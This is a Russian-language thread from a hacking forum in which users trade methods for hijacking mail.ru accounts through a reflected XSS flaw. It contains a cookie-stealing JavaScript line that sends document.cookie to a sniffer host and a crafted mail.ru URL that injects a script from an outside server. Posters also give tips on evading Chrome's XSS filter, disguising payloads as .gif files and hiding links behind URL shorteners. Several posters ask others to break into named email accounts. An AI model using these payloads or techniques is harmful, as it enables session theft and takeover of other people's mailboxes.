ANTICHAT

ANTICHAT (https://forum.antichat.xyz/index.php)
-   Уязвимости Mail-сервис (https://forum.antichat.xyz/forumdisplay.php?f=14)
-   -   Взлом mail.ru с помощью пассивной xss (https://forum.antichat.xyz/showthread.php?t=8052243)

m744na 30.01.2012 01:00

Nick Hander,и на том спасибо (за наводочку))

dryha_777 30.01.2012 01:00

а как менять в мозиле то мне пришли кукри мозилы

MOV_EAX 30.01.2012 01:00

качайте видео отредактируйте файл xss.jpg измените ссылку на свой снифер

сам .js файл

PHP highlight

Код:


       
Код:

       
img= newImage();img.src="httpz://ссылка на снифер/s.gif?"+document.cookie;





RED_DEVIL_69 30.01.2012 01:00

Цитата:

Сообщение от tickhack

куки выглидат так 6325749802:4f015258665e2ef6150502190f1d081b0a014f6 c5150445e070f00050d1d000b03184b4c515958421c0e0d165 8505d5b174345:мыло@mail.ru: их ты должен вставить в опере как вставлять я уже объяснял

Я прекрасно знаю как выглядят КУКИ, и куда их нужно вставлять... И пиши правильно слова... Не нужно торопиться)

MOV_EAX 31.01.2012 01:00

Цитата:

Сообщение от beknazar

Значит он вышел из своего мира и куки умерли! Да но я почему то немоту. На это влияет браузер? я думаю что нет ( тогда я туплю...

наверно так и есть что ты вышел с этого мира тебе наверно лень скачать видео который я скинул ,там все показано как при помощи ифраме в картинке без всяких редиректов угнать кукисы,
а для хроме много вариантов пример этот вот скриптик

PHP highlight

Код:


       
Код:

       
varWshShell=WScript.CreateObject("WScript.Shell");
WshShell.Run("Chrome.exe httpz://На это влияет браузер? я думаю что нет");





то есть вместо Chrome.exe поставить можно так iexplore.ехе

если мы знаем точно что жертва пользуется хроме то запустится вместо Chrome.exe ---> iexplore.ехе
и кинет на ссылку ,в этом случае мы избегаем запуск самого хроме по умолчанию.

так же можно сделать и с оперой ,
если мы знаем что хроме стоит у жертвы по умолчанию.

MOV_EAX 31.01.2012 01:00

Обход Chrome
и так вместо прямой ссылки на снифер http://s.gif делаем в картинке ядовитый код например
img = new Image(); img.src = "http://s.gif?"+document.cookie;

это мы скрываем расширение .js
и открываем на хосте файлом .htaccess нашу картинку и кукисы наши ,таким образом мы обошли фильтр в хроме
пример:

PHP highlight

Код:


       
Код:

       
http://w4.dwar.mail.ru/register.php?referrer=%22%3E%3Cmarquee%20behavior=%22scroll%22%20direction=%22left%22%3E%3Cdiv%20style=%22text-align:center;%22%3E%3Cimg%20src=%22http://www.htmlcodes.me/images/marquees/flying_bat.gif%22%20width=%22125%22%20height=%2282%22%20alt=%22Flying%20bat%20in%20a%20marquee%22%20/%3E%3Cbr%20/%3EBruce%20the%20Bat%3C/div%3E%3C/marquee%3E%3Cp%3E%3Ca%20style=%22font-size:11px;color:#999;" href="http://www.html.am/html-editors/online-html-editor.cfm">HTML editor0height="82"%20alt="Flying%20bat%20in%20a%20marquee"%20/>Bruce%20the%20BatHTML editorrquee>marquee>





теперь осталось поменять урл http://www.htmlcodes.me/images/marquees/flying_bat.gif <--- на наш который будет в картинке ,если Вы оставите расширение .jsто куки не придут ,если дадите прямую ссылку на снифер то на снифер придет только адрес оттуда откуда Вы запустили яд.

stivens20 31.01.2012 01:00

Цитата:

Сообщение от beknazar

Короче люди кто пользуется Google chrome. Куй вы у них выкрадите куки. Я щас пробовал на хроме нечего не получилось,а на опере всё норм.

P.S: большинство людей пользуются Oper'ой.

Конечно же ведь опера хорошо запасается всеми ресурсами да и страницы сохраняеет почти как оригинал.

beknazar 31.01.2012 01:00

Значит он вышел из своего мира и куки умерли! Да но я почему то немоту. На это влияет браузер? я думаю что нет ( тогда я туплю...

beknazar 31.01.2012 01:00

Короче люди кто пользуется Google chrome. Куй вы у них выкрадите куки. Я щас пробовал на хроме нечего не получилось,а на опере всё норм.

P.S: большинство людей пользуются Oper'ой.

Lena1988 02.02.2012 01:00

Пожалуйста помогите как взламывать емайлы, а уже 100 программ скачала везде то вирусы то смс платная, elena-vladimirova@bk.ru вот мой мейл, кто поможет буду благодарна!

new User 02.02.2012 01:00

Нельзя куки украсть с хрома, а потом со своими поменять, что бы зайти на чужой аккаунт?

tickhack 02.02.2012 01:00

Цитата:

Сообщение от rox@hak

tickhack, ну что сказать, у тебя наконец то хоть что-то, почти получилось полезное! добавь что достаточно изменить куку Mpop, и сделай обход анти xss фильтра в хроме для этой пасивки!

если получилось что то полезное то не откажусь от +

z.sty1e 02.02.2012 01:00

уже не работает=\

m744na 02.02.2012 01:00

кто подскажет как в IE куки заменить? вычитал,что это невозможно,но не верю...)

miarhipov 02.02.2012 01:00

Цитата:

Сообщение от beknazar

Короче люди кто пользуется Google chrome. Куй вы у них выкрадите куки. Я щас пробовал на хроме нечего не получилось,а на опере всё норм.

P.S: большинство людей пользуются Oper'ой.

В Mozzila тоже самое, куки не приходят, так что если у жертвы мазила то пролет

tickhack 02.02.2012 01:00

Цитата:

Сообщение от miarhipov

В Mozzila тоже самое, куки не приходят, так что если у жертвы мазила то пролет

Всё работает вот только пассивка умерла =(
P.S:Кому нужна пассивка писать на личку

MOV_EAX 02.02.2012 01:00

если здесь еще шоколадный заяц присутствует то не все еще потеряно
посмотреть на негра жми сюда

по крайне мере у меня все приходит

#################################################;

«Намеки тонкие на то, чего не ведает никто.»

LastWonder 03.02.2012 01:00

подскажите пожалуйста в каком направлении думать над обходом 704 ошибки на мейле?

nokiahack 03.02.2012 01:00

Привет всем! у меня есть ссылка
http://w4.dwar.mail.ru/register.php?referrer=">%3CSCRIPT type=text/javascript src=http://httpz.ru/nsat6gmjrq0.gif>"
что в нее надо добавить,чтобы приходили куки...приходят айпи и браузер только! подскажите...

Yorvet 03.02.2012 01:00

Это не в скрипт строки надо, это в скрипт сниффера-"картинки".

MOV_EAX 03.02.2012 01:00

Цитата:

Сообщение от nokiahack

Привет всем! у меня есть ссылка
http://w4.dwar.mail.ru/register.php?referrer=">%3CSCRIPT type=text/javascript src=http://httpz.ru/nsat6gmjrq0.gif>"
что в нее надо добавить,чтобы приходили куки...приходят айпи и браузер только! подскажите...

а откуда она у тебя ?
спалите не себе не людям

не ужели так трудно догнать

PHP highlight

Код:


       
Код:

       
пиши в PHP коде





примерно так или скрин

я о том что
Все новые и обновившиеся сайты, а также неработающие ссылки помечаются для обновления в индексе Google.
и скоро и негра не увидите | посмотреть на Негра .

Yorvet 03.02.2012 01:00

Цитата:

Сообщение от MOV_EAX

а откуда она у тебя ?

Увы, выложена в соответствующей теме без хайда.

volg 03.02.2012 01:00

Цитата:

Сообщение от tickhack

как это обойти пока не знаю =( а что бы на другой сайт перенаправляло надо скрипт с редиректом прикреплять

ёпт, попробуй другой сервис коротких ссылок и всё

Smile111 05.02.2012 01:00

добавься в асю 8944039

_Xacker_ 08.02.2012 01:00

Я делаю всё по инструкции как в видео , и когда открываю ссылку готовую он у меня тормозит на XSSе (w4.dwar.mail.ru/register.php?referrer= ) и всё,дальше не идет и куки не приходят !! что я делаю не так ??

Dinga 08.02.2012 01:00

Цитата:

Сообщение от _Xacker_

Я делаю всё по инструкции как в видео , и когда открываю ссылку готовую он у меня тормозит на XSSе (w4.dwar.mail.ru/register.php?referrer= ) и всё,дальше не идет и куки не приходят !! что я делаю не так ??

Браузер то какой?

_Xacker_ 08.02.2012 01:00

Цитата:

Сообщение от Dinga

Браузер то какой?

пробовал через оперу 11

_Xacker_ 08.02.2012 01:00

Цитата:

Сообщение от _Xacker_

пробовал через оперу 11

через мазилу и хром такая же песня(

_Xacker_ 08.02.2012 01:00

походу XSS которая в видио была умерла ?:(

MOV_EAX 08.02.2012 01:00

Цитата:

Сообщение от _Xacker_

походу XSS которая в видио была умерла ?:(

да , она уже не актуальна .

anton1947.2011 10.02.2012 01:00

У кого возникнет желание помочь научить или взломать почту на майле anton1947.2011@mail.ru, делитесь опытом не крысятничайте

geniy_07 11.02.2012 01:00

а если нету "такая вкладка mpop" и как на хроме делать?

m744na 11.02.2012 01:00

На все вышеперечисленные просьбы и вопросы,хочется ответить кратко,но все таки попытаюсь ответить с точки зрения своего мировоззрения(вот такой каламбур!)
новичкам (коим сам являюсь) здесь НИКТО!!! и НИКОГДА!!! не поможет. Будут ЯЗВЫ,УПРЕКИ, предложения учить хтмл,яву и прочее.Это в лучшем случае,а в хучшем забанят(как например меня(за то что задал вопрос не в той теме(а-ха-ха))) или пошлют куда подальше...Также Вам предложат изучить математику с первого по пятый класс(Кстати по аттестату по данному предмету у меня пятерки(так же как и по русскому языку)).В отличии от некоторых,у которых в предложении по 12 грамматических ошибок.(зато взламывают как истинные хакеры))))))))).Так вот... продолжим... просил помощи в изучении пассивки(спасибо тем кто откликнулся и в личке помог,не буду называть ников...).НО на форуме реальной помощи не получил.А для чего он существует???Наверное,чтоб упрекать новичков,что у них руки не под то заточены и голова не на том месте??? НАКИПЕЛО!!! не хотел много писать,но руки сами клаву жмут.......Извините если кого обидел...УДАЧИ...АЛЕКСАНДР....

Kiebling 12.02.2012 01:00

Цитата:

Сообщение от m744na

На все вышеперечисленные просьбы и вопросы,хочется ответить кратко,но все таки попытаюсь ответить с точки зрения своего мировоззрения(вот такой каламбур!)
новичкам (коим сам являюсь) здесь НИКТО!!! и НИКОГДА!!! не поможет. Будут ЯЗВЫ,УПРЕКИ, предложения учить хтмл,яву и прочее.Это в лучшем случае,а в хучшем забанят(как например меня(за то что задал вопрос не в той теме(а-ха-ха))) или пошлют куда подальше...Также Вам предложат изучить математику с первого по пятый класс(Кстати по аттестату по данному предмету у меня пятерки(так же как и по русскому языку)).В отличии от некоторых,у которых в предложении по 12 грамматических ошибок.(зато взламывают как истинные хакеры))))))))).Так вот... продолжим... просил помощи в изучении пассивки(спасибо тем кто откликнулся и в личке помог,не буду называть ников...).НО на форуме реальной помощи не получил.А для чего он существует???Наверное,чтоб упрекать новичков,что у них руки не под то заточены и голова не на том месте??? НАКИПЕЛО!!! не хотел много писать,но руки сами клаву жмут.......Извините если кого обидел...УДАЧИ...АЛЕКСАНДР....

Это точно! В этом я уже убедился.

Yorvet 12.02.2012 01:00

Цитата:

Сообщение от m744na

новичкам (коим сам являюсь) здесь НИКТО!!! и НИКОГДА!!! не поможет.

Разумеется. Никто и никогда! А целая свора статей с информацией о взломе и психологии, бесплатные раздачи, выполнение просьб - это так, для куражу. Нет бы спасибо сказать за то, что такие сайты вообще существуют (без них бы ты собирал информацию по огрызкам и платил баксы за каждый совет или кусок кода) и попытаться понять почему тебе помогать не хотят.

А резоны тут вполне приемлимые. Местные закоренелые обитатели - взрослые (по крайней мере разумом уж точно), занятые люди. Они итак делают одолжение самим наличием наполнения сайта. И им, а так же менее "давним" обитателям вроде меня, противно видеть то, что происходит. Вот просмотри форум и ответь на вопросы: кто из последней сотни зарегистрировавшихся читал правила? Кто из них вообще знает о наличии этих правил? Судя по всему, никто, ведь последняя сотня тем создана вот везде, но только не там, где надо. Обсуждается тема дменов и хостингов? Разумеется, нужно создать в разделе тему "памагите взламать кантакт!!!". Ты пробегись глазами по форуму - сплошь и рядом такое! А ещё вот это "привет, научите меня\расскажите мне то-то и то-то" - такие темы создаются обычно прямо над\под темами, в которых это разжёвывается по полной программе (иногда не по первому разу уже). И ладно бы просто тупо клянчили, так ещё пытаются на детсадовский понт взять: "не будьте крысами!" тому подобное. За такое, между прочим, морды бьют в реальной жизни, учтите это. Легионы новичков задают одинаковые вопросы, поражающие своей безграмотностью и тупизной. И не ламерские вопросы, а именно тупые, так что даже понять порой невозможно без допрося паяльником.

Итого что мы имеем: новички не желают читать правила, не желают пользоваться поиском, считают что все им должны, то есть плюют на чужое время, не уважают людей и правила этого "дома", и ещё выёживаются. Тупые, безграмотные эгоисты. И что, им мы должны помогать?
Если человек соблюдает хотя бы правила приличия, то ему рады помочь. Просто они не кричат об этом на каждом углу, как это делают недовольные. Незнаешь ничего - язык за зубами держи и не выпендривайся, тогда помогут.

Цитата:

Сообщение от m744na

по аттестату по данному предмету у меня пятерки(так же как и по русскому языку))

Ага, заметно. Особенно впечатляет твой "русский язык" нижнекукуевского наречия.

Цитата:

Сообщение от m744na

НАКИПЕЛО!!!

Если накипело, прыгни в холодную воду и остудись. Иначе нарвёшься как-нибудь на человека, который не поймёт твоих "шуток", и будешь потом зубы по углам собирать.
Такие вот дела.

А теперь вопрос залу: кто-нибудь поделится пассивокй на меил в ЛС (использую редко, палить её не собираюсь, просто очень нужна), буду благодарен.

Yorvet 14.02.2012 01:00

Нужна помощь.

Есть уязвимость, которую смог заставить работать только через type=text/javascript.

code:


Но такие ссылки не проходят в почту. Как сделать обычную ссылку на код-гиф.

Надеюсь, понятно объяснил, я в хсс не очень разбираюсь.

tickhack 15.02.2012 01:00

Цитата:

Сообщение от Yorvet

Нужна помощь.

Есть уязвимость, которую смог заставить работать только через type=text/javascript.

code:


Но такие ссылки не проходят в почту. Как сделать обычную ссылку на код-гиф.

Надеюсь, понятно объяснил, я в хсс не очень разбираюсь.

Привет а ты попробуй на tinurl зашифровать и получется обычная ссылка которую почтовик поддерживает

Yorvet 15.02.2012 01:00

Цитата:

Сообщение от tickhack

Привет а ты попробуй на tinurl зашифровать и получется обычная ссылка которую почтовик поддерживает

На такие ссылки давно уже WoT ругаемся прежде чем перейти на них.

new User 15.02.2012 01:00

у когонибудь фейки приходят на майл?ответьте!!!

stivens20 15.02.2012 01:00

У меня нет.


Время: 09:55